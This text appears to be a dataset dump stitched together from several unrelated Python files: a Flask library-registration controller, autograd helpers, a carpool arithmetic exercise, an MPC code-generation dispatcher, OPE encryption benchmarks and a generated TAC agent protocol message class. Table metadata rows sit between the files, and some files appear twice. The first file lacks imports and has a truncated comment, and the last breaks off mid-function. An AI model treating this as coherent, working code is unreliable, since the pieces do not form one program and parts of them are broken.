from flask_babel import lazy_gettext as _
from api.admin.problem_details import *
from api.registration.registry import Registration, RemoteRegistry
from core.model import ExternalIntegration, Library, get_one
from core.util.http import HTTP
from core.util.problem_detail import ProblemDetail
from . import SettingsController
class DiscoveryServiceLibraryRegistrationsController(SettingsController):
def __init__(self, manager):
super(DiscoveryServiceLibraryRegistrationsController, self).__init__(manager)
self.goal = ExternalIntegration.DISCOVERY_GOAL
def process_discovery_service_library_registrations(
self,
registration_class=None,
do_get=HTTP.debuggable_get,
do_post=HTTP.debuggable_post,
):
registration_class = registration_class or Registration
self.require_system_admin()
if flask.request.method == "GET":
return self.process_get(do_get)
else:
return self.process_post(registration_class, do_get, do_post)
def process_get(self, do_get=HTTP.debuggable_get):
services = []
for registry in RemoteRegistry.for_protocol_and_goal(
self._db, ExternalIntegration.OPDS_REGISTRATION, self.goal
):
result = registry.fetch_registration_document(do_get=do_get)
if isinstance(result, ProblemDetail):
# mean the whole request is ruined -- just that one of
# the discovery services isn't working. Turn the
access_problem = json.loads(result.response[0])
terms_of_service_link = terms_of_service_html = None
else:
access_problem = None
terms_of_service_link, terms_of_service_html = result
libraries = []
for registration in registry.registrations:
library_info = self.get_library_info(registration)
if library_info:
libraries.append(library_info)
services.append(
dict(
id=registry.integration.id,
access_problem=access_problem,
terms_of_service_link=terms_of_service_link,
terms_of_service_html=terms_of_service_html,
libraries=libraries,
)
)
return dict(library_registrations=services)
def get_library_info(self, registration):
library = registration.library
library_info = dict(short_name=library.short_name)
status = registration.status_field.value
stage_field = registration.stage_field.value
if stage_field:
library_info["stage"] = stage_field
if status:
library_info["status"] = status
return library_info
def look_up_registry(self, integration_id):
registry = RemoteRegistry.for_integration_id(
self._db, integration_id, self.goal
)
if not registry:
return MISSING_SERVICE
return registry
def look_up_library(self, library_short_name):
library = get_one(self._db, Library, short_name=library_short_name)
if not library:
return NO_SUCH_LIBRARY
return library
def process_post(self, registration_class, do_get, do_post):
integration_id = flask.request.form.get("integration_id")
library_short_name = flask.request.form.get("library_short_name")
stage = (
flask.request.form.get("registration_stage") or Registration.TESTING_STAGE
)
registry = self.look_up_registry(integration_id)
if isinstance(registry, ProblemDetail):
return registry
library = self.look_up_library(library_short_name)
if isinstance(library, ProblemDetail):
return library
registration = registration_class(registry, library)
registered = registration.push(
stage, self.url_for, do_get=do_get, do_post=do_post
)
if isinstance(registered, ProblemDetail):
return registered
return Response(str(_("Success")), 200)
| true | true |
1c3321ab02b21c65c4f5b04f4c9668d8d0636669 | 1,063 | py | Python | tf1x/schematic_utils/toy/util.py | dpaiton/DeepSparseCoding | 5ea01fa8770794df5e13743aa3f2d85297c27eb1 | [
"MIT"
] | 12 | 2017-04-27T17:19:31.000Z | 2021-11-07T03:37:59.000Z | tf1x/schematic_utils/toy/util.py | dpaiton/DeepSparseCoding | 5ea01fa8770794df5e13743aa3f2d85297c27eb1 | [
"MIT"
] | 12 | 2018-03-21T01:16:25.000Z | 2022-02-10T00:21:58.000Z | tf1x/schematic_utils/toy/util.py | dpaiton/DeepSparseCoding | 5ea01fa8770794df5e13743aa3f2d85297c27eb1 | [
"MIT"
] | 12 | 2017-02-01T19:49:57.000Z | 2021-12-08T03:16:58.000Z | from itertools import product
import autograd
import autograd.numpy as np
def orthogonalize(twovector):
return np.asarray([-twovector[1], twovector[0]])
def follow_grad(starting_point, f, lims=[0, 1], eps=1e-2):
grad = autograd.grad(f)
points = [starting_point]
point = points[-1]
while (max(point) < max(lims)) & (min(point) > min(lims)):
update = grad(point)
if np.linalg.norm(update) < 1e-10:
break
points.append(point + eps * update)
point = points[-1]
return np.asarray(points)
def normalize_dict(dictionary):
normalized_dict_elems = [
normalize(dict_elem) for dict_elem in dictionary.T]
return np.asarray(normalized_dict_elems).T
def normalize(dictionary_element):
return dictionary_element / np.linalg.norm(dictionary_element)
def compute_grads(f, xlims, ylims, xN, yN):
xs = np.linspace(*xlims, num=xN)
ys = np.linspace(*ylims, num=yN)
grads = [autograd.grad(f)(point) for point in product(xs, ys)]
return grads, list(product(xs, ys))
| 24.159091 | 66 | 0.66604 | from itertools import product
import autograd
import autograd.numpy as np
def orthogonalize(twovector):
return np.asarray([-twovector[1], twovector[0]])
def follow_grad(starting_point, f, lims=[0, 1], eps=1e-2):
grad = autograd.grad(f)
points = [starting_point]
point = points[-1]
while (max(point) < max(lims)) & (min(point) > min(lims)):
update = grad(point)
if np.linalg.norm(update) < 1e-10:
break
points.append(point + eps * update)
point = points[-1]
return np.asarray(points)
def normalize_dict(dictionary):
normalized_dict_elems = [
normalize(dict_elem) for dict_elem in dictionary.T]
return np.asarray(normalized_dict_elems).T
def normalize(dictionary_element):
return dictionary_element / np.linalg.norm(dictionary_element)
def compute_grads(f, xlims, ylims, xN, yN):
xs = np.linspace(*xlims, num=xN)
ys = np.linspace(*ylims, num=yN)
grads = [autograd.grad(f)(point) for point in product(xs, ys)]
return grads, list(product(xs, ys))
| true | true |
1c3321d53937d70c3138dce8331d00032cd770e2 | 569 | py | Python | ex4.py | Tobijoe/LPTHW | 12f3e412c339f51828c909a94fd55ef6e7eb8b5b | [
"MIT"
] | null | null | null | ex4.py | Tobijoe/LPTHW | 12f3e412c339f51828c909a94fd55ef6e7eb8b5b | [
"MIT"
] | null | null | null | ex4.py | Tobijoe/LPTHW | 12f3e412c339f51828c909a94fd55ef6e7eb8b5b | [
"MIT"
] | null | null | null | cars = 100
space_in_a_car = 4.0
drivers = 30
passengers = 90
cars_not_driven = cars - drivers
cars_driven = drivers
carpool_capacity = cars_driven * space_in_a_car
average_passengers_per_car = passengers / cars_driven
print ("There are", cars, "cars available.")
print ("There are only", drivers, "drivers available.")
print ("There will be", cars_not_driven, "empty cars today.")
print ("We can transport", carpool_capacity, "people today.")
print ("We have", passengers, "to carpool today.")
print ("We need to put about", average_passengers_per_car, "in each car") | 37.933333 | 73 | 0.752197 | cars = 100
space_in_a_car = 4.0
drivers = 30
passengers = 90
cars_not_driven = cars - drivers
cars_driven = drivers
carpool_capacity = cars_driven * space_in_a_car
average_passengers_per_car = passengers / cars_driven
print ("There are", cars, "cars available.")
print ("There are only", drivers, "drivers available.")
print ("There will be", cars_not_driven, "empty cars today.")
print ("We can transport", carpool_capacity, "people today.")
print ("We have", passengers, "to carpool today.")
print ("We need to put about", average_passengers_per_car, "in each car") | true | true |
1c3321f2fce232ea67552cbefce40cb955c25c68 | 5,869 | py | Python | conclave/__init__.py | byzhang/conclave | ddc6a39df2c577d1f3cd2c969d67a7760f4b596f | [
"MIT"
] | 69 | 2018-02-28T13:25:24.000Z | 2022-03-17T00:51:43.000Z | conclave/__init__.py | byzhang/conclave | ddc6a39df2c577d1f3cd2c969d67a7760f4b596f | [
"MIT"
] | 5 | 2018-01-29T16:57:19.000Z | 2020-06-15T15:06:57.000Z | conclave/__init__.py | byzhang/conclave | ddc6a39df2c577d1f3cd2c969d67a7760f4b596f | [
"MIT"
] | 25 | 2018-01-23T22:09:11.000Z | 2022-01-16T11:26:44.000Z | import conclave.comp as comp
import conclave.dag as condag
import conclave.partition as part
from conclave.codegen import scotch
from conclave.codegen.python import PythonCodeGen
from conclave.codegen.sharemind import SharemindCodeGen
from conclave.codegen.spark import SparkCodeGen
from conclave.codegen.oblivc import OblivcCodeGen
from conclave.codegen.jiff import JiffCodeGen
from conclave.codegen.single_party import SinglePartyCodegen
from conclave.config import CodeGenConfig
from conclave.dispatch import dispatch_all
from conclave.net import SalmonPeer
from conclave.net import setup_peer
def generate_code(protocol: callable, cfg: CodeGenConfig, mpc_frameworks: list,
local_frameworks: list, apply_optimizations: bool = True):
"""
Applies optimization rewrite passes to protocol, partitions resulting dag, and generates backend specific code
for each sub-dag.
:param protocol: protocol to compile
:param cfg: conclave configuration
:param mpc_frameworks: available mpc backend frameworks
:param local_frameworks: available local-processing backend frameworks
:param apply_optimizations: flag indicating if optimization rewrite passes should be applied to condag
:return: queue of job objects to be executed by dispatcher
"""
dag = condag.OpDag(protocol())
job_queue = []
if "single-party-spark" not in set(mpc_frameworks) and "single-party-python" not in set(mpc_frameworks):
# currently only allow one local and one mpc framework
assert len(mpc_frameworks) == 1 and len(local_frameworks) == 1
# only apply optimizations if required
if apply_optimizations:
dag = comp.rewrite_dag(dag, cfg)
# partition into sub-dags that will run in specific frameworks
mapping = part.heupart(dag, mpc_frameworks, local_frameworks)
# for each sub-dag run code gen and add resulting job to job queue
for job_num, (framework, sub_dag, stored_with) in enumerate(mapping):
print(job_num, framework)
if framework == "sharemind":
name = "{}-sharemind-job-{}".format(cfg.name, job_num)
job = SharemindCodeGen(cfg, sub_dag, cfg.pid).generate(name, cfg.output_path)
job_queue.append(job)
elif framework == "spark":
name = "{}-spark-job-{}".format(cfg.name, job_num)
job = SparkCodeGen(cfg, sub_dag).generate(name, cfg.output_path)
job_queue.append(job)
elif framework == "python":
name = "{}-python-job-{}".format(cfg.name, job_num)
job = PythonCodeGen(cfg, sub_dag).generate(name, cfg.output_path)
job_queue.append(job)
elif framework == "obliv-c":
name = "{}-oblivc-job-{}".format(cfg.name, job_num)
job = OblivcCodeGen(cfg, sub_dag, cfg.pid).generate(name, cfg.output_path)
job_queue.append(job)
elif framework == "jiff":
name = "{}-jiff-job-{}".format(cfg.name, job_num)
job = JiffCodeGen(cfg, sub_dag, cfg.pid).generate(name, cfg.output_path)
job_queue.append(job)
else:
raise Exception("Unknown framework: " + framework)
# TODO: this probably doesn't belong here
if cfg.pid not in stored_with:
job.skip = True
else:
assert len(mpc_frameworks) == 1
if mpc_frameworks[0] == "single-party-spark":
name = "{}-spark-job-0".format(cfg.name)
job = SinglePartyCodegen(cfg, dag, "spark").generate(name, cfg.output_path)
job_queue.append(job)
elif mpc_frameworks[0] == "single-party-python":
name = "{}-python-job-0".format(cfg.name)
job = SinglePartyCodegen(cfg, dag, "python").generate(name, cfg.output_path)
job_queue.append(job)
else:
raise Exception("Unknown framework: {}".format(mpc_frameworks[0]))
return job_queue
def dispatch_jobs(job_queue: list, conclave_config: CodeGenConfig, time_dispatch: bool = False):
"""
Dispatches jobs to respective backends.
:param time_dispatch: will record the execution time of dispatch if true
:param job_queue: jobs to dispatch
:param conclave_config: conclave configuration
"""
networked_peer = None
# if more than one party is involved in the protocol, we need a networked peer
if len(conclave_config.all_pids) > 1:
networked_peer = _setup_networked_peer(conclave_config.network_config)
if time_dispatch:
# TODO use timeit
import time
import datetime
start_time = time.time()
dispatch_all(conclave_config, networked_peer, job_queue)
elapsed_time = time.time() - start_time
formatted_time = datetime.timedelta(milliseconds=(elapsed_time * 1000))
print("TIMED", conclave_config.name, round(elapsed_time, 3), formatted_time)
with open("timing_results.csv", "a+") as time_f:
out = ",".join([conclave_config.name, str(round(elapsed_time, 3)), str(formatted_time)])
time_f.write(out + "\n")
else:
dispatch_all(conclave_config, networked_peer, job_queue)
def generate_and_dispatch(protocol: callable, conclave_config: CodeGenConfig, mpc_frameworks: list,
local_frameworks: list, apply_optimizations: bool = True):
"""
Calls generate_code to generate code from protocol and :func:`~conclave.__init__.dispatch_jobs` to
dispatch it.
"""
job_queue = generate_code(protocol, conclave_config, mpc_frameworks, local_frameworks, apply_optimizations)
dispatch_jobs(job_queue, conclave_config)
def _setup_networked_peer(network_config):
return setup_peer(network_config)
| 41.041958 | 114 | 0.671324 | import conclave.comp as comp
import conclave.dag as condag
import conclave.partition as part
from conclave.codegen import scotch
from conclave.codegen.python import PythonCodeGen
from conclave.codegen.sharemind import SharemindCodeGen
from conclave.codegen.spark import SparkCodeGen
from conclave.codegen.oblivc import OblivcCodeGen
from conclave.codegen.jiff import JiffCodeGen
from conclave.codegen.single_party import SinglePartyCodegen
from conclave.config import CodeGenConfig
from conclave.dispatch import dispatch_all
from conclave.net import SalmonPeer
from conclave.net import setup_peer
def generate_code(protocol: callable, cfg: CodeGenConfig, mpc_frameworks: list,
local_frameworks: list, apply_optimizations: bool = True):
dag = condag.OpDag(protocol())
job_queue = []
if "single-party-spark" not in set(mpc_frameworks) and "single-party-python" not in set(mpc_frameworks):
assert len(mpc_frameworks) == 1 and len(local_frameworks) == 1
if apply_optimizations:
dag = comp.rewrite_dag(dag, cfg)
mapping = part.heupart(dag, mpc_frameworks, local_frameworks)
for job_num, (framework, sub_dag, stored_with) in enumerate(mapping):
print(job_num, framework)
if framework == "sharemind":
name = "{}-sharemind-job-{}".format(cfg.name, job_num)
job = SharemindCodeGen(cfg, sub_dag, cfg.pid).generate(name, cfg.output_path)
job_queue.append(job)
elif framework == "spark":
name = "{}-spark-job-{}".format(cfg.name, job_num)
job = SparkCodeGen(cfg, sub_dag).generate(name, cfg.output_path)
job_queue.append(job)
elif framework == "python":
name = "{}-python-job-{}".format(cfg.name, job_num)
job = PythonCodeGen(cfg, sub_dag).generate(name, cfg.output_path)
job_queue.append(job)
elif framework == "obliv-c":
name = "{}-oblivc-job-{}".format(cfg.name, job_num)
job = OblivcCodeGen(cfg, sub_dag, cfg.pid).generate(name, cfg.output_path)
job_queue.append(job)
elif framework == "jiff":
name = "{}-jiff-job-{}".format(cfg.name, job_num)
job = JiffCodeGen(cfg, sub_dag, cfg.pid).generate(name, cfg.output_path)
job_queue.append(job)
else:
raise Exception("Unknown framework: " + framework)
if cfg.pid not in stored_with:
job.skip = True
else:
assert len(mpc_frameworks) == 1
if mpc_frameworks[0] == "single-party-spark":
name = "{}-spark-job-0".format(cfg.name)
job = SinglePartyCodegen(cfg, dag, "spark").generate(name, cfg.output_path)
job_queue.append(job)
elif mpc_frameworks[0] == "single-party-python":
name = "{}-python-job-0".format(cfg.name)
job = SinglePartyCodegen(cfg, dag, "python").generate(name, cfg.output_path)
job_queue.append(job)
else:
raise Exception("Unknown framework: {}".format(mpc_frameworks[0]))
return job_queue
def dispatch_jobs(job_queue: list, conclave_config: CodeGenConfig, time_dispatch: bool = False):
networked_peer = None
# if more than one party is involved in the protocol, we need a networked peer
if len(conclave_config.all_pids) > 1:
networked_peer = _setup_networked_peer(conclave_config.network_config)
if time_dispatch:
# TODO use timeit
import time
import datetime
start_time = time.time()
dispatch_all(conclave_config, networked_peer, job_queue)
elapsed_time = time.time() - start_time
formatted_time = datetime.timedelta(milliseconds=(elapsed_time * 1000))
print("TIMED", conclave_config.name, round(elapsed_time, 3), formatted_time)
with open("timing_results.csv", "a+") as time_f:
out = ",".join([conclave_config.name, str(round(elapsed_time, 3)), str(formatted_time)])
time_f.write(out + "\n")
else:
dispatch_all(conclave_config, networked_peer, job_queue)
def generate_and_dispatch(protocol: callable, conclave_config: CodeGenConfig, mpc_frameworks: list,
local_frameworks: list, apply_optimizations: bool = True):
job_queue = generate_code(protocol, conclave_config, mpc_frameworks, local_frameworks, apply_optimizations)
dispatch_jobs(job_queue, conclave_config)
def _setup_networked_peer(network_config):
return setup_peer(network_config)
| true | true |
1c332227a6194c8234094026d9cfbccdd8d11330 | 570 | py | Python | benchmark/test_ope.py | MartinHeinz/IoT-Cloud | 2e6fddcfe2624862c9351759334a6655a896e8c7 | [
"MIT"
] | 14 | 2019-11-17T23:49:20.000Z | 2022-02-04T23:28:45.000Z | benchmark/test_ope.py | MartinHeinz/IoT-Cloud | 2e6fddcfe2624862c9351759334a6655a896e8c7 | [
"MIT"
] | 3 | 2019-12-02T18:26:11.000Z | 2021-04-30T20:46:06.000Z | benchmark/test_ope.py | MartinHeinz/IoT-Cloud | 2e6fddcfe2624862c9351759334a6655a896e8c7 | [
"MIT"
] | 4 | 2018-12-28T13:41:44.000Z | 2020-09-13T14:14:06.000Z | from random import randint
import pytest
from pyope.ope import OPE
from client.crypto_utils import instantiate_ope_cipher
@pytest.fixture(scope="module", autouse=True)
def cipher():
random_key = OPE.generate_key()
c = instantiate_ope_cipher(random_key)
return c
def test_ope_encrypt(benchmark, cipher):
benchmark.pedantic(cipher.encrypt, args=(randint(0, 100000),), iterations=100, rounds=100)
def test_ope_decrypt(benchmark, cipher):
benchmark.pedantic(cipher.decrypt, args=(cipher.encrypt(randint(0, 100000)),), iterations=100, rounds=100)
| 25.909091 | 110 | 0.764912 | from random import randint
import pytest
from pyope.ope import OPE
from client.crypto_utils import instantiate_ope_cipher
@pytest.fixture(scope="module", autouse=True)
def cipher():
random_key = OPE.generate_key()
c = instantiate_ope_cipher(random_key)
return c
def test_ope_encrypt(benchmark, cipher):
benchmark.pedantic(cipher.encrypt, args=(randint(0, 100000),), iterations=100, rounds=100)
def test_ope_decrypt(benchmark, cipher):
benchmark.pedantic(cipher.decrypt, args=(cipher.encrypt(randint(0, 100000)),), iterations=100, rounds=100)
| true | true |
1c3322701550af76c8751e686cfd254af5a7c22f | 34,040 | py | Python | packages/fetchai/protocols/tac/message.py | devjsc/agents-aea | 872f7b76cbcd33b6c809905c68681790bb93ff2f | [
"Apache-2.0"
] | null | null | null | packages/fetchai/protocols/tac/message.py | devjsc/agents-aea | 872f7b76cbcd33b6c809905c68681790bb93ff2f | [
"Apache-2.0"
] | null | null | null | packages/fetchai/protocols/tac/message.py | devjsc/agents-aea | 872f7b76cbcd33b6c809905c68681790bb93ff2f | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2021 fetchai
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains tac's message definition."""
import logging
from typing import Any, Dict, Optional, Set, Tuple, cast
from aea.configurations.base import PublicId
from aea.exceptions import AEAEnforceError, enforce
from aea.protocols.base import Message
from packages.fetchai.protocols.tac.custom_types import ErrorCode as CustomErrorCode
_default_logger = logging.getLogger("aea.packages.fetchai.protocols.tac.message")
DEFAULT_BODY_SIZE = 4
class TacMessage(Message):
"""The tac protocol implements the messages an AEA needs to participate in the TAC."""
protocol_id = PublicId.from_str("fetchai/tac:0.15.0")
protocol_specification_id = PublicId.from_str("fetchai/tac:1.0.0")
ErrorCode = CustomErrorCode
class Performative(Message.Performative):
"""Performatives for the tac protocol."""
CANCELLED = "cancelled"
GAME_DATA = "game_data"
REGISTER = "register"
TAC_ERROR = "tac_error"
TRANSACTION = "transaction"
TRANSACTION_CONFIRMATION = "transaction_confirmation"
UNREGISTER = "unregister"
def __str__(self) -> str:
"""Get the string representation."""
return str(self.value)
_performatives = {
"cancelled",
"game_data",
"register",
"tac_error",
"transaction",
"transaction_confirmation",
"unregister",
}
__slots__: Tuple[str, ...] = tuple()
class _SlotsCls:
__slots__ = (
"agent_addr_to_name",
"agent_name",
"amount_by_currency_id",
"counterparty_address",
"counterparty_signature",
"currency_id_to_name",
"dialogue_reference",
"error_code",
"exchange_params_by_currency_id",
"fee_by_currency_id",
"good_id_to_name",
"info",
"ledger_id",
"message_id",
"nonce",
"performative",
"quantities_by_good_id",
"sender_address",
"sender_signature",
"target",
"transaction_id",
"utility_params_by_good_id",
"version_id",
)
def __init__(
self,
performative: Performative,
dialogue_reference: Tuple[str, str] = ("", ""),
message_id: int = 1,
target: int = 0,
**kwargs: Any,
):
"""
Initialise an instance of TacMessage.
:param message_id: the message id.
:param dialogue_reference: the dialogue reference.
:param target: the message target.
:param performative: the message performative.
"""
super().__init__(
dialogue_reference=dialogue_reference,
message_id=message_id,
target=target,
performative=TacMessage.Performative(performative),
**kwargs,
)
@property
def valid_performatives(self) -> Set[str]:
"""Get valid performatives."""
return self._performatives
@property
def dialogue_reference(self) -> Tuple[str, str]:
"""Get the dialogue_reference of the message."""
enforce(self.is_set("dialogue_reference"), "dialogue_reference is not set.")
return cast(Tuple[str, str], self.get("dialogue_reference"))
@property
def message_id(self) -> int:
"""Get the message_id of the message."""
enforce(self.is_set("message_id"), "message_id is not set.")
return cast(int, self.get("message_id"))
@property
def performative(self) -> Performative: # type: ignore # noqa: F821
"""Get the performative of the message."""
enforce(self.is_set("performative"), "performative is not set.")
return cast(TacMessage.Performative, self.get("performative"))
@property
def target(self) -> int:
"""Get the target of the message."""
enforce(self.is_set("target"), "target is not set.")
return cast(int, self.get("target"))
@property
def agent_addr_to_name(self) -> Dict[str, str]:
"""Get the 'agent_addr_to_name' content from the message."""
enforce(
self.is_set("agent_addr_to_name"),
"'agent_addr_to_name' content is not set.",
)
return cast(Dict[str, str], self.get("agent_addr_to_name"))
@property
def agent_name(self) -> str:
"""Get the 'agent_name' content from the message."""
enforce(self.is_set("agent_name"), "'agent_name' content is not set.")
return cast(str, self.get("agent_name"))
@property
def amount_by_currency_id(self) -> Dict[str, int]:
"""Get the 'amount_by_currency_id' content from the message."""
enforce(
self.is_set("amount_by_currency_id"),
"'amount_by_currency_id' content is not set.",
)
return cast(Dict[str, int], self.get("amount_by_currency_id"))
@property
def counterparty_address(self) -> str:
"""Get the 'counterparty_address' content from the message."""
enforce(
self.is_set("counterparty_address"),
"'counterparty_address' content is not set.",
)
return cast(str, self.get("counterparty_address"))
@property
def counterparty_signature(self) -> str:
"""Get the 'counterparty_signature' content from the message."""
enforce(
self.is_set("counterparty_signature"),
"'counterparty_signature' content is not set.",
)
return cast(str, self.get("counterparty_signature"))
@property
def currency_id_to_name(self) -> Dict[str, str]:
"""Get the 'currency_id_to_name' content from the message."""
enforce(
self.is_set("currency_id_to_name"),
"'currency_id_to_name' content is not set.",
)
return cast(Dict[str, str], self.get("currency_id_to_name"))
@property
def error_code(self) -> CustomErrorCode:
"""Get the 'error_code' content from the message."""
enforce(self.is_set("error_code"), "'error_code' content is not set.")
return cast(CustomErrorCode, self.get("error_code"))
@property
def exchange_params_by_currency_id(self) -> Dict[str, float]:
"""Get the 'exchange_params_by_currency_id' content from the message."""
enforce(
self.is_set("exchange_params_by_currency_id"),
"'exchange_params_by_currency_id' content is not set.",
)
return cast(Dict[str, float], self.get("exchange_params_by_currency_id"))
@property
def fee_by_currency_id(self) -> Dict[str, int]:
"""Get the 'fee_by_currency_id' content from the message."""
enforce(
self.is_set("fee_by_currency_id"),
"'fee_by_currency_id' content is not set.",
)
return cast(Dict[str, int], self.get("fee_by_currency_id"))
@property
def good_id_to_name(self) -> Dict[str, str]:
"""Get the 'good_id_to_name' content from the message."""
enforce(self.is_set("good_id_to_name"), "'good_id_to_name' content is not set.")
return cast(Dict[str, str], self.get("good_id_to_name"))
@property
def info(self) -> Optional[Dict[str, str]]:
"""Get the 'info' content from the message."""
return cast(Optional[Dict[str, str]], self.get("info"))
@property
def ledger_id(self) -> str:
"""Get the 'ledger_id' content from the message."""
enforce(self.is_set("ledger_id"), "'ledger_id' content is not set.")
return cast(str, self.get("ledger_id"))
@property
def nonce(self) -> str:
"""Get the 'nonce' content from the message."""
enforce(self.is_set("nonce"), "'nonce' content is not set.")
return cast(str, self.get("nonce"))
@property
def quantities_by_good_id(self) -> Dict[str, int]:
"""Get the 'quantities_by_good_id' content from the message."""
enforce(
self.is_set("quantities_by_good_id"),
"'quantities_by_good_id' content is not set.",
)
return cast(Dict[str, int], self.get("quantities_by_good_id"))
@property
def sender_address(self) -> str:
"""Get the 'sender_address' content from the message."""
enforce(self.is_set("sender_address"), "'sender_address' content is not set.")
return cast(str, self.get("sender_address"))
@property
def sender_signature(self) -> str:
"""Get the 'sender_signature' content from the message."""
enforce(
self.is_set("sender_signature"), "'sender_signature' content is not set."
)
return cast(str, self.get("sender_signature"))
@property
def transaction_id(self) -> str:
"""Get the 'transaction_id' content from the message."""
enforce(self.is_set("transaction_id"), "'transaction_id' content is not set.")
return cast(str, self.get("transaction_id"))
@property
def utility_params_by_good_id(self) -> Dict[str, float]:
"""Get the 'utility_params_by_good_id' content from the message."""
enforce(
self.is_set("utility_params_by_good_id"),
"'utility_params_by_good_id' content is not set.",
)
return cast(Dict[str, float], self.get("utility_params_by_good_id"))
@property
def version_id(self) -> str:
"""Get the 'version_id' content from the message."""
enforce(self.is_set("version_id"), "'version_id' content is not set.")
return cast(str, self.get("version_id"))
def _is_consistent(self) -> bool:
"""Check that the message follows the tac protocol."""
try:
enforce(
type(self.dialogue_reference) == tuple,
"Invalid type for 'dialogue_reference'. Expected 'tuple'. Found '{}'.".format(
type(self.dialogue_reference)
),
)
enforce(
type(self.dialogue_reference[0]) == str,
"Invalid type for 'dialogue_reference[0]'. Expected 'str'. Found '{}'.".format(
type(self.dialogue_reference[0])
),
)
enforce(
type(self.dialogue_reference[1]) == str,
"Invalid type for 'dialogue_reference[1]'. Expected 'str'. Found '{}'.".format(
type(self.dialogue_reference[1])
),
)
enforce(
type(self.message_id) == int,
"Invalid type for 'message_id'. Expected 'int'. Found '{}'.".format(
type(self.message_id)
),
)
enforce(
type(self.target) == int,
"Invalid type for 'target'. Expected 'int'. Found '{}'.".format(
type(self.target)
),
)
# Light Protocol Rule 2
# Check correct performative
enforce(
type(self.performative) == TacMessage.Performative,
"Invalid 'performative'. Expected either of '{}'. Found '{}'.".format(
self.valid_performatives, self.performative
),
)
# Check correct contents
actual_nb_of_contents = len(self._body) - DEFAULT_BODY_SIZE
expected_nb_of_contents = 0
if self.performative == TacMessage.Performative.REGISTER:
expected_nb_of_contents = 1
enforce(
type(self.agent_name) == str,
"Invalid type for content 'agent_name'. Expected 'str'. Found '{}'.".format(
type(self.agent_name)
),
)
elif self.performative == TacMessage.Performative.UNREGISTER:
expected_nb_of_contents = 0
elif self.performative == TacMessage.Performative.TRANSACTION:
expected_nb_of_contents = 10
enforce(
type(self.transaction_id) == str,
"Invalid type for content 'transaction_id'. Expected 'str'. Found '{}'.".format(
type(self.transaction_id)
),
)
enforce(
type(self.ledger_id) == str,
"Invalid type for content 'ledger_id'. Expected 'str'. Found '{}'.".format(
type(self.ledger_id)
),
)
enforce(
type(self.sender_address) == str,
"Invalid type for content 'sender_address'. Expected 'str'. Found '{}'.".format(
type(self.sender_address)
),
)
enforce(
type(self.counterparty_address) == str,
"Invalid type for content 'counterparty_address'. Expected 'str'. Found '{}'.".format(
type(self.counterparty_address)
),
)
enforce(
type(self.amount_by_currency_id) == dict,
"Invalid type for content 'amount_by_currency_id'. Expected 'dict'. Found '{}'.".format(
type(self.amount_by_currency_id)
),
)
for (
key_of_amount_by_currency_id,
value_of_amount_by_currency_id,
) in self.amount_by_currency_id.items():
enforce(
type(key_of_amount_by_currency_id) == str,
"Invalid type for dictionary keys in content 'amount_by_currency_id'. Expected 'str'. Found '{}'.".format(
type(key_of_amount_by_currency_id)
),
)
enforce(
type(value_of_amount_by_currency_id) == int,
"Invalid type for dictionary values in content 'amount_by_currency_id'. Expected 'int'. Found '{}'.".format(
type(value_of_amount_by_currency_id)
),
)
enforce(
type(self.fee_by_currency_id) == dict,
"Invalid type for content 'fee_by_currency_id'. Expected 'dict'. Found '{}'.".format(
type(self.fee_by_currency_id)
),
)
for (
key_of_fee_by_currency_id,
value_of_fee_by_currency_id,
) in self.fee_by_currency_id.items():
enforce(
type(key_of_fee_by_currency_id) == str,
"Invalid type for dictionary keys in content 'fee_by_currency_id'. Expected 'str'. Found '{}'.".format(
type(key_of_fee_by_currency_id)
),
)
enforce(
type(value_of_fee_by_currency_id) == int,
"Invalid type for dictionary values in content 'fee_by_currency_id'. Expected 'int'. Found '{}'.".format(
type(value_of_fee_by_currency_id)
),
)
enforce(
type(self.quantities_by_good_id) == dict,
"Invalid type for content 'quantities_by_good_id'. Expected 'dict'. Found '{}'.".format(
type(self.quantities_by_good_id)
),
)
for (
key_of_quantities_by_good_id,
value_of_quantities_by_good_id,
) in self.quantities_by_good_id.items():
enforce(
type(key_of_quantities_by_good_id) == str,
"Invalid type for dictionary keys in content 'quantities_by_good_id'. Expected 'str'. Found '{}'.".format(
type(key_of_quantities_by_good_id)
),
)
enforce(
type(value_of_quantities_by_good_id) == int,
"Invalid type for dictionary values in content 'quantities_by_good_id'. Expected 'int'. Found '{}'.".format(
type(value_of_quantities_by_good_id)
),
)
enforce(
type(self.nonce) == str,
"Invalid type for content 'nonce'. Expected 'str'. Found '{}'.".format(
type(self.nonce)
),
)
enforce(
type(self.sender_signature) == str,
"Invalid type for content 'sender_signature'. Expected 'str'. Found '{}'.".format(
type(self.sender_signature)
),
)
enforce(
type(self.counterparty_signature) == str,
"Invalid type for content 'counterparty_signature'. Expected 'str'. Found '{}'.".format(
type(self.counterparty_signature)
),
)
elif self.performative == TacMessage.Performative.CANCELLED:
expected_nb_of_contents = 0
elif self.performative == TacMessage.Performative.GAME_DATA:
expected_nb_of_contents = 9
enforce(
type(self.amount_by_currency_id) == dict,
"Invalid type for content 'amount_by_currency_id'. Expected 'dict'. Found '{}'.".format(
type(self.amount_by_currency_id)
),
)
for (
key_of_amount_by_currency_id,
value_of_amount_by_currency_id,
) in self.amount_by_currency_id.items():
enforce(
type(key_of_amount_by_currency_id) == str,
"Invalid type for dictionary keys in content 'amount_by_currency_id'. Expected 'str'. Found '{}'.".format(
type(key_of_amount_by_currency_id)
),
)
enforce(
type(value_of_amount_by_currency_id) == int,
"Invalid type for dictionary values in content 'amount_by_currency_id'. Expected 'int'. Found '{}'.".format(
type(value_of_amount_by_currency_id)
),
)
enforce(
type(self.exchange_params_by_currency_id) == dict,
"Invalid type for content 'exchange_params_by_currency_id'. Expected 'dict'. Found '{}'.".format(
type(self.exchange_params_by_currency_id)
),
)
for (
key_of_exchange_params_by_currency_id,
value_of_exchange_params_by_currency_id,
) in self.exchange_params_by_currency_id.items():
enforce(
type(key_of_exchange_params_by_currency_id) == str,
"Invalid type for dictionary keys in content 'exchange_params_by_currency_id'. Expected 'str'. Found '{}'.".format(
type(key_of_exchange_params_by_currency_id)
),
)
enforce(
